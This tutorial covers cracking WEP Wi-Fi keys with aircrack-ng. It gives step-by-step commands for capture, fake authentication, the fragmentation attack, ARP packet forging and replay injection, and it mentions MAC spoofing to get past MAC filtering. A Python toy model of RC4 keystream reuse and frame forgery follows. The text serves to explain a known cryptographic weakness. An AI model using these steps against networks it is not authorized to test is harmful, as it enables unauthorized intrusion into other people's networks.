WEP is an old encryption standard (deprecated by IEEE in 2004) but it is still found on some networks. It uses the RC4 stream cipher: every frame is encrypted with a key made of the shared WEP key plus a 24-bit per-packet IV that is sent in the clear, and is decrypted at the other end with the same IV and key. Because the IV is only 24 bits it repeats quickly on a busy network, and the statistical attacks in aircrack-ng recover the shared key from a few tens of thousands of captured IVs.

Assuming the wifi card is already in monitor mode (interface mon0).
Checking available networks:
>airodump-ng mon0
Launching airodump on the target network only, writing the capture to disk:
>airodump-ng --channel [ch] --bssid [target MAC] --write [filename] mon0
We can see the different clients connected to the network, if any. A busy network with associated clients is the simplest case: the #Data column climbs on its own, and each data frame is a new IV.
Now cracking the capture file created in the last step (airodump-ng appends a counter, so the file is [filename]-01.cap):
>aircrack-ng [filename]-01.cap

Now consider the harder case: the AP is idle, or has no associated clients generating much traffic, so IVs trickle in too slowly. We need to inject our own packets, but first we have to authenticate our wifi card with the AP, otherwise it silently ignores any frame we send.

Using fake authentication (the 0 is the re-authentication delay, so we authenticate once):
>aireplay-ng --fakeauth 0 -a [target MAC] -h [our MAC] [interface]

If it works, aireplay-ng reports a successful association and the AUTH column for the target in airodump-ng shows OPN (open-system authentication). If the AP uses MAC filtering this step fails, and our MAC has to be changed to that of an allowed client first.


Next we obtain about 1500 bytes of PRGA (the RC4 pseudo-random generation algorithm output, i.e. the keystream for one IV) with the fragmentation attack. Since the key is never needed, only the keystream, those bytes are enough to forge a new packet under the same IV. Injecting that packet makes the AP answer with freshly encrypted frames, so new IVs are generated for us to capture.

>aireplay-ng --fragment -b [target MAC] -h [our MAC] [interface]

The recovered keystream is written to a file named fragment-[timestamp].xor.


Next, forge a new packet. -0 builds an ARP request; -k and -l are the destination and source IP (255.255.255.255 for both works against any AP, since it is broadcast), -y is the .xor file from the last step:

>packetforge-ng -0 -a [target MAC] -h [our MAC] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxx.xor] -w [output]


Now injecting the forged packet into traffic with interactive replay (-2) while airodump-ng keeps capturing; the AP re-broadcasts each ARP with a new IV, so #Data should climb quickly:

>aireplay-ng -2 -r [output from last step] [interface]

Once enough IVs have been collected, run aircrack-ng on the capture file to crack the key as done before.
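The reason the fragmentation and packetforge-ng steps above need no key is that WEP reuses one RC4 keystream per IV: known plaintext XOR ciphertext gives the keystream, and a new payload XORed with that keystream (plus a freshly computed CRC-32 ICV) decrypts cleanly at the AP. The following is an added example, not part of the original post or the aircrack-ng suite; it models WEP's per-frame encryption on a constructed key, IV and payload (802.11 headers are omitted, and the whole known plaintext is assumed rather than bootstrapped from the 8 fixed LLC/SNAP bytes as the real attack does) and shows the forgery end to end.

```python
"""Toy WEP (RC4 + CRC-32 ICV) model: recover the per-IV keystream from a known
plaintext and use it to forge a new, validly checksummed frame without the key.
Added example; key, IV and payloads below are constructed, not captured."""
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key-scheduling, then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended to the payload."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame = IV (3 bytes, clear) || (payload || ICV) XOR RC4(IV || key)."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    ks = rc4_keystream(iv + key, len(payload) + 4)
    return iv + xor(payload + icv(payload), ks)


def wep_decrypt(key: bytes, frame: bytes):
    """AP side: returns the payload if the ICV verifies, else None (frame dropped)."""
    iv, ct = frame[:3], frame[3:]
    pt = xor(ct, rc4_keystream(iv + key, len(ct)))
    payload, tag = pt[:-4], pt[-4:]
    return payload if icv(payload) == tag else None


def recover_keystream(frame: bytes, known_payload: bytes):
    """Attacker side: ciphertext XOR known (payload || ICV) = keystream for this IV.
    This is the PRGA material the fragmentation attack writes to its .xor file."""
    iv, ct = frame[:3], frame[3:]
    return iv, xor(ct, known_payload + icv(known_payload))


def forge_frame(iv: bytes, keystream: bytes, new_payload: bytes) -> bytes:
    """What packetforge-ng does: compute the ICV for our own payload and XOR
    payload || ICV with the recovered keystream, reusing the same IV. No key needed."""
    pt = new_payload + icv(new_payload)
    if len(pt) > len(keystream):
        raise ValueError(f"need {len(pt)} keystream bytes, have {len(keystream)}")
    return iv + xor(pt, keystream[: len(pt)])


def demo() -> bytes:
    """Capture one frame with a guessable body, forge a new one, let the 'AP' decrypt it."""
    key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit WEP key
    iv = b"\x01\x02\x03"                                # constructed IV
    # LLC/SNAP header for ARP (aa aa 03 00 00 00 08 06) is the same in every ARP
    # frame, which is why ARP is the usual known plaintext; body is constructed.
    known = bytes.fromhex("aaaa030000000806") + b"ARP-REQUEST-BODY"
    captured = wep_encrypt(key, iv, known)              # what airodump-ng would see
    iv, ks = recover_keystream(captured, known)         # fragment attack's .xor output
    forged = forge_frame(iv, ks, b"INJECTED-BY-ATTACKER")
    return wep_decrypt(key, forged)                     # AP accepts: ICV verifies


if __name__ == "__main__":
    print(demo())
```

The same reasoning is why the AP's replies to the injected ARP are useful: each reply is encrypted under a new IV, and the key-recovery attack only needs many distinct (IV, keystream-leak) pairs, not the plaintext of any particular frame.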

